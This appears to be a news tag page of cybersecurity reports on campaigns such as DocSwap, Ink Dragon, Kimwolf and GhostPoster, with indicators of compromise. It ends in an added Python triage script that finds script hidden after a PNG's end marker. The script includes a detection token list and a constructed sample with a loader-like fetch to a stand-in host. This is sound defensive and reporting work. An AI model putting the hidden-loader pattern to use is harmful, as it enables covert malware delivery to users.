Tag: Cyber Threats

  • Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App

    Dec 18, 2025 | Ravie Lakshmanan | Malware / Mobile Security

    The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express).

    “The threat actor leveraged QR codes and notification pop-ups to lure victims into installing and executing the malware on their mobile devices,” ENKI said. “The malicious app decrypts an embedded encrypted APK and launches a malicious service that provides RAT capabilities.”

    “Since Android blocks apps from unknown sources and displays security warnings by default, the threat actor claims the app is a safe, official release to trick victims into ignoring the warning and installing the malware.”

    According to the South Korean cybersecurity company, some of these artifacts masquerade as package delivery service apps. It’s being assessed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps.

    A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status.

    Present within the page is a tracking PHP script that checks the browser’s User-Agent string and then displays a message urging the visitor to install a security module under the guise of verifying their identity due to supposed “international customs security policies.”

    Should the victim proceed to install the app, an APK package (“SecDelivery.apk”) is downloaded from the server (“27.102.137[.]181”). The APK file then decrypts and loads an encrypted APK embedded into its resources to launch the new version of DocSwap, but not before ascertaining that it has obtained the necessary permission to read and manage external storage, access the internet, and install additional packages.

    “Once it confirms all permissions, it immediately registers the MainService of the newly loaded APK as ‘com.delivery.security.MainService,’” ENKI said. “Simultaneously with service registration, the base application launches AuthActivity. This activity masquerades as an OTP authentication screen and verifies the user’s identity using a delivery number.”

    The shipment number is hard-coded within the APK as “742938128549,” and is likely delivered alongside the malicious URL during the initial access phase. Once the user enters the provided delivery number, the application is configured to generate a random six-digit verification code and display it as a notification, following which they are prompted to input the generated code.

    As soon as the code is provided, the app opens a WebView with the legitimate URL “www.cjlogistics[.]com/ko/tool/parcel/tracking,” while, in the background, the trojan connects to an attacker-controlled server (“27.102.137[.]181:50005”) and receives as many as 57 commands that allow it to log keystrokes, capture audio, start and stop camera recording, perform file operations, run commands, upload and download files, and gather location data, SMS messages, contacts, call logs, and a list of installed apps.

    ENKI said it also discovered two other samples disguised as a P2B Airdrop app and a trojanized version of a legitimate VPN program called BYCOM VPN (“com.bycomsolutions.bycomvpn”) that’s available on the Google Play Store and developed by an Indian IT services company named Bycom Solutions.

    “This indicates that the threat actor injected malicious functionality into the legitimate APK and repackaged it for use in the attack,” the security company added.

    Further analysis of the threat actor infrastructure has uncovered phishing sites mimicking South Korean platforms like Naver and Kakao that seek to capture users’ credentials. These sites, in turn, have been found to share overlaps with a prior Kimsuky credential harvesting campaign targeting Naver users.

    “The executed malware launches a RAT service, similarly to past cases, but demonstrates evolved capabilities such as using a new native function to decrypt the internal APK and incorporating diverse decoy behaviors,” ENKI said.


    Source: thehackernews.com…

  • CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation

    Dec 18, 2025 | Ravie Lakshmanan | Vulnerability / Software Security

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical flaw impacting ASUS Live Update to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

    The vulnerability, tracked as CVE-2025-59374 (CVSS score: 9.3), has been described as an “embedded malicious code vulnerability” introduced by means of a supply chain compromise that could allow attackers to perform unintended actions.

    “Certain versions of the ASUS Live Update client were distributed with unauthorized modifications introduced through a supply chain compromise,” according to a description of the flaw published in CVE.org. “The modified builds could cause devices meeting specific targeting conditions to perform unintended actions. Only devices that met these conditions and installed the compromised versions were affected.”

    It’s worth noting that the vulnerability refers to the supply chain attack that came to light in March 2019, when ASUS acknowledged that an advanced persistent threat (APT) group managed to breach some of its servers as part of a campaign codenamed Operation ShadowHammer by Kaspersky. The activity is said to have run between June and November 2018.

    The Russian cybersecurity company said the goal of the attacks was to “surgically target” an unknown pool of users whose machines were identified by their network adapters’ MAC addresses. The trojanized versions of the artifacts came embedded with a hard-coded list of more than 600 unique MAC addresses.

    “A small number of devices have been implanted with malicious code through a sophisticated attack on our Live Update servers in an attempt to target a very small and specific user group,” ASUS noted at the time. The issue was fixed in version 3.6.8 of the Live Update software.

    The development comes a few weeks after ASUS formally announced that the Live Update client has reached end-of-support (EOS) as of December 4, 2025. The last version is 3.6.15. As a result, CISA has urged Federal Civilian Executive Branch (FCEB) agencies still relying on the tool to discontinue its use by January 7, 2026.

    “ASUS is committed to software security and consistently provides real-time updates to help protect and enhance devices,” the company said in a support page. “Automatic, real-time software updates are available via the ASUS Live Update application. Please update the ASUS Live Update to V3.6.8 or higher version to resolve security concerns.”


    Source: thehackernews.com…

  • China-Linked Ink Dragon Hacks Governments Using ShadowPad and FINALDRAFT Malware

    The threat actor known as Jewelbug has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America.

    Check Point Research is tracking the cluster under the name Ink Dragon. It’s also referenced by the broader cybersecurity community under the names CL-STA-0049, Earth Alux, and REF7707. The China-aligned hacking group is assessed to be active since at least March 2023.

    “The actor’s campaigns combine solid software engineering, disciplined operational playbooks, and a willingness to reuse platform-native tools to blend into normal enterprise telemetry,” the cybersecurity company said in a technical breakdown published Tuesday. “This mix makes their intrusions both effective and stealthy.”

    Eli Smadja, group manager of Products R&D at Check Point Software, told The Hacker News that the activity is still ongoing, and that the campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.”

    Details of the threat group first emerged in February 2025 when Elastic Security Labs and Palo Alto Networks Unit 42 detailed its use of a backdoor called FINALDRAFT (aka Squidoor) that’s capable of infecting both Windows and Linux systems. In recent months, Ink Dragon has also been attributed a five-month-long intrusion targeting a Russian IT service provider.

    Attack chains mounted by the adversary have leveraged vulnerable services in internet-exposed web applications to drop web shells, which are then used to deliver additional payloads like VARGEIT and Cobalt Strike beacons to facilitate command-and-control (C2), discovery, lateral movement, defense evasion, and data exfiltration.

    Another notable backdoor in the threat actor’s malware arsenal is NANOREMOTE, which uses the Google Drive API for uploading and downloading files between the C2 server and the compromised endpoint. Check Point said it did not encounter the malware in the intrusions and investigations it observed.

    “It is possible that the actor selectively deploys tools from a broader toolkit, depending on the victim’s environment, operational needs, and the desire to blend in with legitimate traffic,” Smadja said.

    Ink Dragon has also relied on predictable or mismanaged ASP.NET machine key values to carry out ViewState deserialization attacks against vulnerable IIS and SharePoint servers, and then install a custom ShadowPad IIS Listener module to turn these compromised servers into part of its C2 infrastructure and enable them to proxy commands and traffic, improving resilience in the process.

    “This design allows attackers to route traffic not only deeper inside a single organization’s network, but also across different victim networks entirely,” Check Point said. “As a result, one compromise can quietly become another hop in a global, multi-layered infrastructure supporting ongoing campaigns elsewhere, blending operational control with strategic reuse of previously breached assets.”

    The listener module is also equipped to run different commands on the IIS machine, providing attackers with greater control over the system to conduct reconnaissance and stage payloads.

    In addition to exploiting publicly disclosed machine keys to achieve ASP.NET ViewState deserialization, the threat actor has been found to weaponize ToolShell SharePoint flaws to drop web shells on compromised servers. Other steps carried out by Ink Dragon are listed below –

    • Use the IIS machine key to obtain a local administrative credential and leverage it for lateral movement over an RDP tunnel
    • Create scheduled tasks and install services to establish persistence
    • Dump LSASS memory and extract registry hives to achieve privilege escalation
    • Modify host firewall rules to allow outbound traffic and transform the infected hosts into a ShadowPad relay network

    “In at least one instance, the actor located an idle RDP session belonging to a Domain Administrator that had authenticated via Network Level Authentication (CredSSP) using NTLMv2 fallback. Since the session remained disconnected but not logged off, it is highly likely that LSASS retained the associated logon token and NTLM verifier in memory,” Check Point said.

    “Ink Dragon obtained SYSTEM-level access to the host, extracted the token (and possibly the NTLM key material), and reused it to perform authenticated SMB operations. Through these actions, they were able to write to administrative shares and exfiltrate NTDS.dit and registry hives, marking the point at which they achieved domain-wide privilege escalation and control.”

    The intrusions have been found to rely on a number of components rather than a single backdoor or a monolithic framework to establish long-term persistence. These include –

    • ShadowPad Loader, which is used to decrypt and run the ShadowPad core module in memory
    • CDBLoader, which uses Microsoft Console Debugger (“cdb.exe”) to run shellcode and load encrypted payloads
    • LalsDumper, which extracts an LSASS dump
    • 032Loader, which is used to decrypt and execute payloads
    • FINALDRAFT, an updated version of the known remote administration tool that abuses Outlook and the Microsoft Graph API for C2

    “The cluster has introduced a new variant of FINALDRAFT malware with enhanced stealth and higher exfiltration throughput, along with advanced evasion techniques that enable stealthy lateral movement and multi-stage malware deployment across compromised networks,” Check Point said.

    “FINALDRAFT implements a modular command framework in which operators push encoded command documents to the victim’s mailbox, and the implant pulls, decrypts, and executes them.”

    The cybersecurity company also pointed out that it detected evidence of a second threat actor known as REF3927 (aka RudePanda) on “several” of the same victim environments breached by Ink Dragon. That said, there are no indications that the two clusters are operationally linked. It’s believed that both intrusion sets exploited the same initial access methods to obtain footholds.

    “Ink Dragon presents a threat model in which the boundary between ‘compromised host’ and ‘command infrastructure’ no longer exists,” Check Point concluded. “Each foothold becomes a node in a larger, operator-controlled network – a living mesh that grows stronger with every additional victim.”

    “Defenders must therefore view intrusions not only as local breaches but as potential links in an external, attacker-managed ecosystem, where shutting down a single node is insufficient unless the entire relay chain is identified and dismantled. Ink Dragon’s relay-centric architecture is among the more mature uses of ShadowPad observed to date. A blueprint for long-term, multi-organizational access built on the victims themselves.”


    Source: thehackernews.com…

  • Fix SOC Blind Spots: See Threats to Your Industry & Country in Real Time

    Modern security teams often feel like they’re driving through fog with failing headlights. Threats accelerate, alerts multiply, and SOCs struggle to understand which dangers matter right now for their business. Breaking out of reactive defense is no longer optional. It’s the difference between preventing incidents and cleaning up after them.

    Below is the path from reactive firefighting to a proactive, context-rich SOC that actually sees what’s coming.

    When the SOC Only Sees in the Rear-View Mirror

    Many SOCs still rely on a backward-facing workflow. Analysts wait for an alert, investigate it, escalate, and eventually respond. This pattern is understandable: the job is noisy, the tooling is complex, and alert fatigue bends even the toughest teams into reactive mode.

    But a reactive posture hides several structural problems:

    • No visibility into what threat actors are preparing.
    • Limited ability to anticipate campaigns targeting the organization’s sector.
    • Inability to adjust defenses before an attack hits.
    • Overreliance on signatures that reflect yesterday’s activity.

    The result is a SOC that constantly catches up but rarely gets ahead.

    The Cost of Waiting for the Alarm to Ring

    Reactive SOCs pay in time, money, and risk.

    • Longer investigations. Analysts must research every suspicious object from scratch because they lack a broader context.
    • Wasted resources. Without visibility into which threats are relevant to their vertical and geography, teams chase false positives instead of focusing on real dangers.
    • Higher breach likelihood. Threat actors often reuse infrastructure and target specific industries. Seeing these patterns late gives attackers the advantage.

    A proactive SOC flips this script by reducing uncertainty. It knows which threats are circulating in its environment, what campaigns are active, and which alerts deserve immediate escalation.

    Threat Intelligence: The Engine of Proactive Security

    Threat intelligence fills the gaps left by reactive operations. It provides a stream of evidence about what attackers are doing right now and how their tools evolve.

    ANY.RUN’s Threat Intelligence Lookup serves as a tactical magnifying glass for SOCs. It converts raw threat data into an operational asset.

    Figure: TI Lookup: investigate threats and indicators, click search bar to select parameters

    Analysts can quickly:

    • Enrich alerts with behavioral and infrastructure data;
    • Identify malware families and campaigns with precision;
    • Understand how a sample acts when detonated in a sandbox;
    • Investigate artifacts, DNS, IPs, hashes, and relations in seconds.

    For organizations that aim to build a more proactive stance, TI Lookup works as the starting point for faster triage, higher-confidence decisions, and a clearer understanding of threat relevance.

    ANY.RUN’s TI Feeds complement SOC workflows by supplying continuously updated indicators gathered from real malware executions. This ensures defenses adapt at the speed of threat evolution.

    Focus on Threats that Actually Matter to Your Business

    But context alone isn’t enough; teams need to interpret this intelligence for their specific business environment. Threats are not evenly distributed across the world. Each sector and region has its own constellation of malware families, campaigns, and criminal groups.

    Figure: Companies from which industries and countries have encountered Tycoon 2FA most often recently

    Threat Intelligence Lookup supports industry and geographic attribution of threats and indicators, helping SOCs answer vital questions:

    • Is this alert relevant to our company’s sector?
    • Is this malware known to target companies in our country?
    • Are we seeing the early movements of a campaign aimed at organizations like ours?

    By mapping activity to both industry verticals and geographies, SOCs gain an immediate understanding of where a threat sits in their risk landscape. This reduces noise, speeds up triage, and lets teams focus on threats that truly demand action.

    Here is an example: a suspicious domain turns out to be linked to Lumma Stealer and ClickFix attacks targeting mostly telecom and hospitality businesses in the USA and Canada:

    domainName:"benelui.click"

    Figure: Industries and countries most targeted by threats the IOC is linked to

    Or suppose a CISO at a German manufacturing company wants a baseline for sector risks:

    industry:"Manufacturing" and submissionCountry:"DE"

    Figure: TI Lookup summary on malware samples analyzed by German users and targeting manufacturing businesses

    This query surfaces top threats like Tycoon 2FA and EvilProxy and highlights the interest of the Storm-1747 group, which operates Tycoon 2FA, in the country’s production sector. This becomes an immediate priority list for detection engineering, threat hunting hypotheses, and security awareness training.

    Analysts can access sandbox sessions and real-world IOCs related to those threats. The IOCs and TTPs that TI Lookup provides instantly feed detection rules for the most relevant threats, allowing teams to detect and mitigate incidents proactively and protect businesses and their customers.

    View a sandbox session of Lumma stealer sample analysis:

    Figure: Sandbox analysis: see malware in action, view kill chain, gather IOCs

    Why the Threat Landscape Demands Better Visibility

    Attackers’ infrastructure is changing fast and it’s no longer limited to one threat per campaign. We’re now seeing the emergence of hybrid threats, where multiple malware families are combined within a single operation. These blended attacks merge logic from different infrastructures, redirection layers, and credential-theft modules, making detection, tracking, and attribution significantly harder.

    Figure: Hybrid attack with Salty and Tycoon detected inside ANY.RUN sandbox in just 35 seconds

    Recent investigations uncovered Tycoon 2FA and Salty working side by side in the same chain. One kit runs the initial lure and reverse proxy, while another takes over for session hijacking or credential capture. For many SOC teams, this combination breaks the existing defense strategies and detection rules, allowing attackers to slip past the security layer.

    Tracking these changes across the broader threat landscape has become critical. Analysts must monitor behavior patterns and attack logic in real time, not just catalog kit variants. The faster teams can see these links forming, the faster they can respond to phishing campaigns built for adaptability.

    Conclusion: A Clearer Horizon for Modern SOCs

    Businesses can’t afford SOC blind spots anymore. Attackers specialize, campaigns localize, and malware evolves faster than signatures can keep up. Proactive defense requires context, clarity, and speed.

    Threat Intelligence Lookup strengthened with industry and geo context and supported by fresh indicators from TI Feeds gives SOC leaders exactly that. Instead of reacting to alerts in the dark, decision makers gain a forward-looking view of the threats that really matter to their business.


    Source: thehackernews.com…

  • New ForumTroll Phishing Attacks Target Russian Scholars Using Fake eLibrary Emails

    Dec 17, 2025 | Ravie Lakshmanan | Vulnerability / Malware

    The threat actor linked to Operation ForumTroll has been attributed to a fresh set of phishing attacks targeting individuals within Russia, according to Kaspersky.

    The Russian cybersecurity vendor said it detected the new activity in October 2025. The origins of the threat actor are presently unknown.

    “While the spring cyberattacks focused on organizations, the fall campaign honed in on specific individuals: scholars in the field of political science, international relations, and global economics, working at major Russian universities and research institutions,” security researcher Georgy Kucherin said.

    Operation ForumTroll refers to a series of sophisticated phishing attacks exploiting a then-zero-day vulnerability in Google Chrome (CVE-2025-2783) to deliver the LeetAgent backdoor and a spyware implant known as Dante.

    The latest attack wave also commences with emails claiming to be from eLibrary, a Russian scientific electronic library, with the messages sent from the address “support@e-library[.]wiki.” The domain was registered in March 2025, six months before the start of the campaign, suggesting that preparations for the attack had been underway for some time.

    Kaspersky said the strategic domain aging was done to avoid raising any red flags typically associated with sending emails from a freshly registered domain. In addition, the attackers also hosted a copy of the legitimate eLibrary homepage (“elibrary[.]ru”) on the bogus domain to maintain the ruse.

    The emails instruct prospective targets to click on an embedded link pointing to the malicious site to download a plagiarism report. Should a victim follow through, a ZIP archive with the naming pattern “<LastName>_<FirstName>_<Patronymic>.zip” is downloaded to their machine.

    What’s more, these links are designed for one-time use, meaning any subsequent attempts to navigate to the URL cause it to display a Russian-language message stating “Download failed, please try again later.” In the event the download is attempted from a platform other than Windows, the user is prompted to “try again later on a Windows computer.”

    “The attackers also carefully personalized the phishing emails for their targets, specific professionals in the field,” the company said. “The downloaded archive was named with the victim’s last name, first name, and patronymic.”

    The archive contains a Windows shortcut (LNK) with the same name, which, when executed, runs a PowerShell script to download and launch a PowerShell-based payload from a remote server. The payload then contacts a URL to fetch a final-stage DLL and persist it using COM hijacking. It also downloads and displays a decoy PDF to the victim.

    The final payload is a command-and-control (C2) and red teaming framework known as Tuoni, enabling the threat actors to gain remote access to the victim’s Windows device.

    “ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022,” Kaspersky said. “Given this lengthy timeline, it is likely this APT group will continue to target entities and individuals of interest within these two countries.”

    The disclosure comes as Positive Technologies detailed the activities of two threat clusters, QuietCrabs – a suspected Chinese hacking group also tracked as UTA0178 and UNC5221 – and Thor, which appears to be involved in ransomware attacks since May 2025.

    These intrusion sets have been found to leverage security flaws in Microsoft SharePoint (CVE-2025-53770), Ivanti Endpoint Manager Mobile (CVE-2025-4427 and CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), and Ivanti Sentry (CVE-2023-38035).

    Attacks carried out by QuietCrabs take advantage of the initial access to deploy an ASPX web shell and use it to deliver a JSP loader that’s capable of downloading and executing KrustyLoader, which then drops the Sliver implant.

    “Thor is a threat group first observed in attacks against Russian companies in 2025,” researchers Alexander Badayev, Klimentiy Galkin, and Vladislav Lunin said. “As final payloads, the attackers use LockBit and Babuk ransomware, as well as Tactical RMM and MeshAgent to maintain persistence.”


    Source: thehackernews.com…

  • APT28 Targets Ukrainian UKR-net Users in Long-Running Credential Phishing Campaign

    Dec 17, 2025 | Ravie Lakshmanan | Email Security / Threat Intelligence

    The Russian state-sponsored threat actor known as APT28 has been attributed to what has been described as a “sustained” credential-harvesting campaign targeting users of UKR[.]net, a webmail and news service popular in Ukraine.

    The activity, observed by Recorded Future’s Insikt Group between June 2024 and April 2025, builds upon prior findings from the cybersecurity company in May 2024 that detailed the hacking group’s attacks targeting European networks with the HeadLace malware and credential-harvesting web pages.

    APT28 is also tracked as BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. It’s assessed to be affiliated with Russia’s Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU).

    The latest attacks are characterized by the deployment of UKR[.]net-themed login pages on legitimate services like Mocky to entice recipients into entering their credentials and two-factor authentication (2FA) codes. Links to these pages are embedded within PDF documents that are distributed via phishing emails.

    The links are shortened using services like tiny[.]cc or tinyurl[.]com. In some cases, the threat actor has also been observed using subdomains created on platforms like Blogger (*.blogspot[.]com) to launch a two-tier redirection chain that leads to the credential harvesting page.

    The efforts are part of a broader set of phishing and credential theft operations orchestrated by the adversary since the mid-2000s, targeting government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks in pursuit of Russia’s strategic objectives.

    “While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements,” the Mastercard-owned company said in a report shared with The Hacker News.

    What has changed is the transition from using compromised routers to proxy tunneling services such as ngrok and Serveo to capture and relay the stolen credentials and 2FA codes.

    “BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024,” Recorded Future said. “The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.”


    Source: thehackernews.com…

  • SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances

    Dec 17, 2025 | Ravie Lakshmanan | Vulnerability / Network Security

    SonicWall has rolled out fixes to address a security flaw in Secure Mobile Access (SMA) 100 series appliances that it said has been actively exploited in the wild.

    The vulnerability, tracked as CVE-2025-40602 (CVSS score: 6.6), concerns a case of local privilege escalation that arises as a result of insufficient authorization in the appliance management console (AMC).

    It affects the following versions –

    • 12.4.3-03093 (platform-hotfix) and earlier versions – Fixed in 12.4.3-03245 (platform-hotfix)
    • 12.5.0-02002 (platform-hotfix) and earlier versions – Fixed in 12.5.0-02283 (platform-hotfix)

    “This vulnerability was reported to be leveraged in combination with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges,” SonicWall said.

    It’s worth noting that CVE-2025-23006 was patched by the company in late January 2025 in version 12.4.3-02854 (platform-hotfix).

    Clément Lecigne and Zander Work of Google Threat Intelligence Group (GTIG) have been credited with discovering and reporting CVE-2025-40602. There are currently no details on the scale of the attacks and who is behind the efforts.

    Back in July, Google said it’s tracking a cluster named UNC6148 that’s targeting fully-patched end-of-life SonicWall SMA 100 series devices as part of a campaign designed to drop a backdoor called OVERSTEP. It’s currently not clear if these activities are related.

    In light of active exploitation, it’s essential that SonicWall SMA 100 series users apply the fixes as soon as possible.


    Source: thehackernews.com…

  • Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks


    A new distributed denial-of-service (DDoS) botnet known as Kimwolf has enlisted a massive army of no less than 1.8 million infected devices comprising Android-based TVs, set-top boxes, and tablets, and may be associated with another botnet known as AISURU, according to findings from QiAnXin XLab.

    “Kimwolf is a botnet compiled using the NDK [Native Development Kit],” the company said in a report published today. “In addition to typical DDoS attack capabilities, it integrates proxy forwarding, reverse shell, and file management functions.”

    The hyper-scale botnet is estimated to have issued 1.7 billion DDoS attack commands within a three-day period between November 19 and 22, 2025, around the same time one of its command-and-control (C2) domains – 14emeliaterracewestroxburyma02132[.]su – came first in Cloudflare’s list of top 100 domains, briefly even surpassing Google.

    Kimwolf’s primary infection targets are TV boxes deployed in residential network environments. Some of the affected device models include TV BOX, SuperBOX, HiDPTAndroid, P200, X96Q, XBOX, SmartTV, and MX10. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. That said, the exact means by which the malware is propagated to these devices is presently unclear.


    XLab said its investigation into the botnet commenced after it received a “version 4” artifact of Kimwolf from a trusted community partner on October 24, 2025. Since then, an additional eight samples were discovered last month.

    “We observed that Kimwolf’s C2 domains have been successfully taken down by unknown parties at least three times [in December], forcing it to upgrade its tactics and turn to using ENS (Ethereum Name Service) to harden its infrastructure, demonstrating its powerful evolutionary capability,” XLab researchers said.

    That’s not all. Earlier this month, XLab managed to successfully seize control of one of the C2 domains, enabling it to assess the scale of the botnet.

    An interesting aspect of Kimwolf is that it’s tied to the infamous AISURU botnet, which has been behind some of the record-breaking DDoS attacks over the past year. It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection.

    XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts.

    “These two major botnets propagated through the same infection scripts between September and November, coexisting in the same batch of devices,” the company said. “They actually belong to the same hacker group.”

    This assessment is based on similarities in APK packages uploaded to the VirusTotal platform, in some cases even using the same code signing certificate (“John Dinglebert Dinglenut VIII VanSack Smith”). Further definitive evidence arrived on December 8, 2025, with the discovery of an active downloader server (“93.95.112[.]59”) that contained a script referencing APKs for both Kimwolf and AISURU.

    The malware itself is fairly straightforward. Once launched, it ensures that only one instance of the process runs on the infected device, decrypts the embedded C2 domain, resolves it over DNS-over-TLS to obtain the C2 IP address, and connects to that address to receive and execute commands.

    Recent versions of the botnet malware detected as recently as December 12, 2025, have introduced a technique known as EtherHiding that makes use of an ENS domain (“pawsatyou[.]eth”) to fetch the actual C2 IP from the associated smart contract (0xde569B825877c47fE637913eCE5216C644dE081F) in an effort to render its infrastructure more resilient to takedown efforts.


    Specifically, this involves extracting an IPv6 address from the “lol” field of the transaction, taking the last four bytes of that address, and XORing them with the 32-bit key 0x93141715 to recover the actual C2 IP address.

    Besides encrypting sensitive data related to C2 servers and DNS resolvers, Kimwolf uses TLS encryption for network communications to receive DDoS commands. In all, the malware supports 13 DDoS attack methods over UDP, TCP, and ICMP. The attack targets, per XLab, are located in the U.S., China, France, Germany, and Canada.

    Further analysis has determined that over 96% of the commands relate to using the bot nodes for providing proxy services. This indicates the attackers’ attempts to exploit the bandwidth from compromised devices and maximize profit. As part of the effort, a Rust-based Command Client module is deployed to form a proxy network.

    Also delivered to the nodes is a ByteConnect software development kit (SDK), a monetization solution that allows app developers and IoT device owners to monetize their traffic.

    “Giant botnets originated with Mirai in 2016, with infection targets mainly concentrated on IoT devices like home broadband routers and cameras,” XLab said. “However, in recent years, information on multiple million-level giant botnets like Badbox, Bigpanzi, Vo1d, and Kimwolf has been disclosed, indicating that some attackers have started to turn their attention to various smart TVs and TV boxes.”


    Source: thehackernews.com…

  • GhostPoster Malware Found in 17 Firefox Add-ons with 50,000+ Downloads


    Dec 17, 2025Ravie LakshmananAd Fraud / Browser Security

    A new campaign named GhostPoster has leveraged logo files associated with 17 Mozilla Firefox browser add-ons to embed malicious JavaScript code designed to hijack affiliate links, inject tracking code, and commit click and ad fraud.

    The extensions have been collectively downloaded over 50,000 times, according to Koi Security, which discovered the campaign. The add-ons are no longer available.

    These browser programs were advertised as VPNs, screenshot utilities, ad blockers, and unofficial versions of Google Translate. The oldest add-on, Dark Mode, was published on October 25, 2024, offering the ability to enable a dark theme for all websites. The full list of the browser add-ons is below –

    • Free VPN
    • Screenshot
    • Weather (weather-best-forecast)
    • Mouse Gesture (crxMouse)
    • Cache – Fast site loader
    • Free MP3 Downloader
    • Google Translate (google-translate-right-clicks)
    • Traductor de Google
    • Global VPN – Free Forever
    • Dark Reader Dark Mode
    • Translator – Google Bing Baidu DeepL
    • Weather (i-like-weather)
    • Google Translate (google-translate-pro-extension)
    • 谷歌翻译
    • libretv-watch-free-videos
    • Ad Stop – Best Ad Blocker
    • Google Translate (right-click-google-translate)

    “What they actually deliver is a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” security researchers Lotan Sery and Noga Gouldman said.

    The attack chain begins when one of the above-mentioned extensions is loaded and fetches its own logo file. The malicious code parses the image looking for a marker containing the “===” sign and extracts the JavaScript that follows it: a loader that reaches out to an external server (“www.liveupdt[.]com” or “www.dealctr[.]com”) to retrieve the main payload, waiting 48 hours between attempts.

    To further evade detection, the loader is configured to fetch the payload only 10% of the time. This randomness is deliberate: an analyst watching network traffic from a freshly installed copy will usually see nothing. The retrieved payload is a custom-encoded toolkit that monetizes browser activity without the victim’s knowledge in five different ways –

    • Affiliate link hijacking, which intercepts affiliate links to e-commerce sites like Taobao or JD.com, depriving legitimate affiliates of their commission
    • Tracking injection, which inserts the Google Analytics tracking code into every web page visited by the victim, to silently profile them
    • Security header stripping, which removes security headers like Content-Security-Policy and X-Frame-Options from HTTP responses, exposing users to clickjacking and cross-site scripting attacks
    • Hidden iframe injection, which injects invisible iframes into pages to load URLs from attacker-controlled servers and enable ad and click fraud
    • CAPTCHA bypass, which employs various methods to bypass CAPTCHA challenges and evade bot detection safeguards
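    A practitioner triaging an unpacked add-on would want a quick way to find image assets that carry appended script. The following Python script is an added example for this page, not Koi Security’s tooling or the malware’s loader: it assumes a bare “===” as the marker (the page does not publish the exact string), uses a small assumed list of JavaScript tokens as a heuristic, and scans a constructed minimal PNG as sample input. For real PNGs the bytes after the IEND chunk are the region worth inspecting, since decoders ignore them.

```python
import sys
from pathlib import Path
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# The article says the loader searches the logo for a marker containing "===".
# The exact marker is not published; a bare "===" is an assumption here.
MARKER = b"==="
# Assumed token list: a cheap "does this region look like JavaScript?" check.
JS_HINTS = (b"function", b"fetch(", b"eval(", b"XMLHttpRequest", b"document.",
            b"chrome.", b"browser.", b"setTimeout", b"=>")
IMAGE_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico", ".webp"}


def png_trailer(blob: bytes) -> bytes:
    """Bytes after the IEND chunk of a PNG (empty if not a PNG or no IEND).

    A well-formed PNG ends with the 12-byte IEND chunk (length, type, CRC);
    decoders ignore anything after it, which makes it a convenient hiding spot.
    """
    if not blob.startswith(PNG_SIG):
        return b""
    idx = blob.rfind(b"IEND")
    return b"" if idx < 0 else blob[idx + 4 + 4:]    # skip type (4) + CRC (4)


def carve_after_marker(blob: bytes, marker: bytes = MARKER) -> Optional[bytes]:
    """Everything after the first occurrence of the marker, or None if absent."""
    idx = blob.find(marker)
    return None if idx < 0 else blob[idx + len(marker):]


def looks_like_js(data: bytes, min_hits: int = 2) -> bool:
    """Heuristic: at least min_hits distinct JavaScript tokens present."""
    return sum(1 for tok in JS_HINTS if tok in data) >= min_hits


def inspect_asset(blob: bytes) -> dict:
    """Triage one image blob. For PNGs only the post-IEND trailer is searched,
    so a stray "===" inside compressed pixel data does not count as a hit."""
    trailer = png_trailer(blob)
    region = trailer if blob.startswith(PNG_SIG) else blob
    carved = carve_after_marker(region)
    candidate = carved if carved is not None else region
    return {
        "png_trailer_len": len(trailer),
        "has_marker": carved is not None,
        "js_like": looks_like_js(candidate),
    }


def scan_extension(root: Path) -> list:
    """Walk an unpacked add-on directory; return (relative path, info) for
    images that carry a post-IEND trailer or script-like content."""
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in IMAGE_SUFFIXES:
            info = inspect_asset(p.read_bytes())
            if info["js_like"] or info["png_trailer_len"] > 0:
                findings.append((str(p.relative_to(root)), info))
    return findings


# Constructed sample: a minimal PNG (signature + IEND only), with and without
# an appended marker and loader-like script. Not real GhostPoster artifacts.
CLEAN_PNG = PNG_SIG + b"\x00\x00\x00\x00IEND\xaeB`\x82"
BAD_PNG = CLEAN_PNG + MARKER + b"function go(){fetch('https://example.invalid/p')}"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, info in scan_extension(Path(sys.argv[1])):
            print(path, info)
    else:
        print("clean:", inspect_asset(CLEAN_PNG))
        print("bad:  ", inspect_asset(BAD_PNG))
```

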